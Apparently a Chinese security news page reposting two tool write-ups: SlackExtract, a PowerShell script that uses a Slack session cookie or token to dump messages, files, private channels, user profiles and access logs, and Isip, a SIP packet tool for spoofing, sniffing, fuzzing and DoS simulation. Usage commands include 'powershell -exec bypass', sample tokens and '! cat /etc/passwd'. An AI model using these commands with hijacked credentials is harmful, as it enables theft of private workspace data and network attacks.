SlackExtract:用于提取slack用户所有文件的PowerShell脚本
secist 2018-11-14 7:0 转存

SlackExtract是一个用于从用户slack帐户中提取所有文件,消息和用户配置文件的PowerShell脚本。或者,你也可以指定channels频道(最多为默认限制)来提取这些数据。

从 Windows 命令行输入 powershell 并启用脚本:

powershell -exec bypass

导入模块:

Import-Module .\SlackExtract.ps1

使用说明:

Get-Help Invoke-SlackExtract -full

必需参数:

SlackUrl(例如 https://slackextract.slack.com

OutputFolderName(例如 my-extraction)

dCookie(例如 wvxP…8%3D)或 SlackToken(例如 xoxs-12…65)

示例1:提取所有文件和消息

这将从用户有权访问的各个channel中提取所有消息和文件。默认输出保存到Document/SlackExtract目录下,并会为每个channel创建一个单独的文件夹,如下所示。

BasicUsage.png

提供 dCookie

Invoke-SlackExtract -OutputFolderName my-extraction -SlackUrl https://slackextract.slack.com -dCookie wvxPLsXuW%2BUjT2b5RiCvb%2BUBPlJEX2XWbnVpOTlQZUN1TFF6dkxrNlZJbExYTzN6TmNtdFZNTDY0Y2pVQlF6UXlannhZMkprcHRueE12TVpXaXRvRWtQZGhidlhPdEh2d0J1a0I0UjcxMlRJV2JmTndDMlh1czNlUCt0SWIyczExb0z1ZCtxL3JJRW9tenJFRDhIdmp2MWVIQytLc3Q0RWZLSEFvdTQxUFE9PSy1X4xNmoY5wXzFlw2GJL8%3D

提供 API Token

Invoke-SlackExtract -OutputFolderName my-extraction -SlackUrl https://slackextract.slack.com -SlackToken xoxs-420083410720-421837374423-440811613314-977844f625b707d5b0b268206dbc92cbc85feef3e71b08e44815a8e6e7657190

获取 dCookie 和 API Token

有关获取dCookie或SlackToken的方法,请参阅此处

默认限制(可通过可选参数更改默认值)

限制参数 默认值
MaxMessagesPerChannel 10,000
MaxFilesPerChannel 2,000
MaxUsers 100,000
MaxAccessLogs* 1000,0000

* 仅付费工作区的管理员可访问

示例2:提取用户配置文件

通过MaxUsers参数最多可以指定提取1000个用户的配置文件。每个用户的详细信息都将作为单独的json文件,写入meta/Users目录中。 此外,还会为我们创建一个all_users.csv文件,以便于我们在Excel中查看和排序数据,如下所示。

Invoke-SlackExtract -ExtractUsers -MaxUsers 1000 -OutputFolderName my-extraction -SlackUrl https://slackextract.slack.com -SlackToken xoxs-420083410720-421837374423-440811613314-977844f625b707d5b0b268206dbc92cbc85feef3e71b08e44815a8e6e7657190

UserProfiles.png

示例3:仅从私人频道(Private Channels)提取数据

Invoke-SlackExtract -PrivateOnly -OutputFolderName my-extraction -SlackUrl https://slackextract.slack.com -SlackToken xoxs-420083410720-421837374423-440811613314-977844f625b707d5b0b268206dbc92cbc85feef3e71b08e44815a8e6e7657190

示例4:仅从特定 Channels 提取数据

你可以提供一个以逗号分隔的Channel IDs列表,从这些特定频道中提取数据。连接到Slack工作区时,你可以在Web浏览器的URL栏中看到channel ID。你还可以使用ExcludeChannelIds参数来将特定频道排除在外。

Invoke-SlackExtract -ChannelIds DD0081E5C,CCC2FCAE4,GD00AAMFY -OutputFolderName my-extraction -SlackUrl https://slackextract.slack.com -SlackToken xoxs-420083410720-421837374423-440811613314-977844f625b707d5b0b268206dbc92cbc85feef3e71b08e44815a8e6e7657190

示例5:提取访问日志

访问日志包含每个用户连接到Slack工作区时的IP地址和用户代理,如下所示。要提取访问日志,用户必须为付费工作区的管理员。

Invoke-SlackExtract -ExtractAccessLogs -MaxAccessLogs 200 -OutputFolderName my-extraction -SlackUrl https://slackextract.slack.com -SlackToken xoxs-420083410720-421837374423-440811613314-977844f625b707d5b0b268206dbc92cbc85feef3e71b08e44815a8e6e7657190

AccessLogs.png

搜索提取的数据

提取的数据将以UTF-16格式写入文件,因此你将无法使用grep的方式来搜索数据。但你可以使用PowerShell搜索提取的数据,有关详情请参阅此处

*参考来源:GitHub,FB小编secist编译,转载请注明来自FreeBuf.COM

原文阅读

技术讨论 | 看我如何使用Isip拦截、分析和修改网络数据包
Alpha_h4ck 2018-11-14 2:30 转存

今天给大家介绍的是一款名叫Isip的模拟工具,该工具套装可用于数据包修改、嗅探、模拟中间人攻击、模糊测试和模拟DoS攻击等等。

222222222222222.png

工具演示视频

视频地址:https://asciinema.org/a/11128

工具安装

git clone https://github.com/halitalptekin/isip.git

cd isip

pip install -r requirements.txt

工具使用

数据包模拟工具可以在packet命令循环中找到,输入命令之后,你将会进入到main命令循环中:

isip:main>packet

isip:packet>

大家可以使用new命令创建一个新的sip数据包,如果你没有给数据包命名的话,isip会默认以message-{id}的形式命名数据包。

isip:packet>new

isip:packet>new r1

使用list命令列举出所有新创建的sip数据包

isip:packet>list

使用show命令查看数据包属性,你还可以配合ip、udp或sip选项跟show命令一起使用:

isip:packet>show message-1

isip:packet>show message-1 ip

isip:packet>show message-1 udp

isip:packet>show message-1 sip

isip:packet>show message-1 ip src

isip:packet>show message-1 udp sport

isip:packet>show message-1 sip uri

isip:packet>show message-1 sip headers.to

使用set命令设置数据包属性,你还可以配合ip、udp或sip命令来进行设置:

isip>set message-1 ip src 12.12.12.12

isip>set message-1 udp sport 4545

isip>set message-1 sip method OPTIONS

isip>set message-1 sip headers.from "blabla"

使用set命令设置数据包随机属性,你还可以配合random-headers-from,  random-headers-to, random-headers-call-id,random-headers-max-forwards, random-headers-user-agent, random-headers-contact,random-headers-invite-cseq和 random-headers-register-cseq命令一起使用。

isip:packet>set message-1 ip src random-ip

isip:packet>set message-1 udp sport random-port

isip:packet>set message-1 sip headers.from random-headers-from

isip:packet>set message-1 sip headers.to random-headers-to

isip:packet>set message-1 sip headers.contact random-headers-contact

isip:packet>set message-1 sip body random-data 50

使用send命令发送数据包:

isip:packet>send message-1 1

isip:packet>send message-1 150

使用parse命令解析数据包中的文本信息:

isip:packet>parse test/test1.txt r1

使用load命令从pcap文件中加载数据包,如果你没有对数据包命名,工具会自动以message-{id}的形式命名:

isip:packet>load test.pcap r1

isip:packet>load test.pcap

接下来,使用save命令保存数据包为pcap文件:

isip:packet>save r1 test.pcap

isip:packet>save r2 test.pcap # assume you have r2.0, r2.1, r2.2, r2.3 ...

使用wireshark命令,用wireshark打开数据包:

isip:packet>wireshark r1

isip:packet>wireshark r2 # assume you have r2.0, r2.1, r2.2, r2.3 ...

使用hist命令查看操作记录:

isip:packet>hist

使用shell或!命令执行Shell代码:

isip:packet>shell ls -la

isip:packet>! cat /etc/passwd

使用?或help命令查看帮助页面:

isip>?

isip>help

isip:packet>?

isip:packet>help

isip:packet>help new

isip:packet>help send

isip:packet>help set

isip:packet>help show

项目地址

GitHub主页:【传送门

*参考来源:isip,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

原文阅读

本站作者

每日荐书

在不完美的世界力求正常——读《公司的坏话》

书名:《公司的坏话》

作者:李天田(脱不花妹妹)

出版社:北京大学出版社

赞助商

广告